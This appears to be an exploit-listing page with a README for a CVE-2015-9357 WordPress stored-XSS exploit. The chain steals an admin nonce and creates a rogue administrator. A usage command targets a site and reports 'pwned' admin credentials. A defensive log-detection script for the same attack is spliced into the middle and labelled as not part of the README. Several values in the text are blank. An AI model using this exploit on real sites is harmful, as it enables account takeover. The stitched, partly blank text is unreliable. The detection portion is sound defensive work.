## https://sploitus.com/exploit?id=AFA9B134-5F05-5222-9883-9FF99C6BDF35
# CVE-2015-9357

wordpress smiley/emoticon parser stored xss, admin user creation via forged nonce request.

breaks out of `` attribute context through the emoticon regex, lands js in an `onerror` handler. no script tag needed, survives wp_kses filtering on the affected field.

chain: submit payload to any field that gets smiley-converted, admin views it, xss fires in their session, pulls create-user nonce from user-new.php, posts new administrator account, confirm via login.

lab/educational use only. requires the target field to actually apply wordpress smiley conversion, varies by theme/plugin.
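The chain above ends with the admin's own browser submitting the user-new.php form from a page it happened to be viewing. A defender can look for exactly that shape in web-server logs. The following detection script is an added example, not part of this README or the exploit, and the log lines, hostnames and IPs in it are constructed. It parses combined-format access log lines and flags a POST to `/wp-admin/user-new.php` when the Referer is not the user-new.php form itself (a script-driven request fires from whatever admin page the payload rendered in) or when the form was fetched and submitted within a few seconds (faster than a human fills it in); both thresholds are heuristics chosen for the example.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (Apache combined format), not real traffic.
# Modelled on the chain in the README: a POST of user-supplied content to
# admin-ajax.php, an admin browsing wp-admin, then a GET and an immediate POST
# to user-new.php whose Referer is the page the admin was viewing. The last two
# lines are a legitimate, human-paced use of the same form for contrast.
SAMPLE_LOG = """\
203.0.113.9 - - [12/Oct/2023:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Oct/2023:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2023:10:05:10 +0000] "GET /wp-admin/edit-comments.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2023:10:05:11 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 6000 "https://site.example/wp-admin/edit-comments.php" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2023:10:05:12 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://site.example/wp-admin/edit-comments.php" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2023:11:30:00 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 6000 "https://site.example/wp-admin/users.php" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2023:11:31:40 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://site.example/wp-admin/user-new.php" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
USER_FORM = "/wp-admin/user-new.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["path"] = d["path"].split("?", 1)[0]  # drop the query string for matching
    return d


def find_suspicious_user_creation(lines, max_form_seconds=5):
    """Return findings for POSTs to user-new.php that look script-driven.

    Heuristics (assumptions for this example, tune to your environment):
      * the POST's Referer is not user-new.php itself, i.e. it was sent from
        some other admin page rather than from the rendered form;
      * the same client fetched the form less than max_form_seconds earlier.
    """
    events = [e for e in (parse_line(l) for l in lines) if e]
    last_form_get = {}  # ip -> timestamp of the client's last GET of the form
    findings = []
    for e in events:
        if not e["path"].endswith(USER_FORM):
            continue
        if e["method"] == "GET":
            last_form_get[e["ip"]] = e["ts"]
            continue
        if e["method"] != "POST":
            continue
        reasons = []
        if not e["referer"].endswith(USER_FORM):
            reasons.append("referer is not the user-new.php form: %s" % (e["referer"] or "-"))
        fetched = last_form_get.get(e["ip"])
        if fetched is not None:
            delta = (e["ts"] - fetched).total_seconds()
            if delta < max_form_seconds:
                reasons.append("form submitted %.0fs after it was fetched" % delta)
        if reasons:
            findings.append({"ip": e["ip"], "ts": e["ts"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_user_creation(SAMPLE_LOG.splitlines()):
        print("%s %s user-new.php POST flagged:" % (f["ts"].isoformat(), f["ip"]))
        for r in f["reasons"]:
            print("  - " + r)
```

Run on the constructed sample it flags only the 10:05:12 POST (wrong Referer and a one-second fill time) and leaves the 11:31:40 submission alone. In practice pair this with a check that the resulting account is an administrator, and with a review of whichever content field was submitted to admin-ajax.php just before the admin's session.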

original vuln disclosure: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html

## usage

```
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
  --endpoint https://target/wp-admin/admin-ajax.php \
  --field message --action  --nonce  \
  --data "name=a,email=a@a.com,phone=a"
```

`--endpoint` / `--field` depend on where the vulnerable input actually lives (comments, contact form, etc.); find it manually first.

output on success: admin creds (`pwned` / `Password123!`) and wp-admin url.

## by saretawa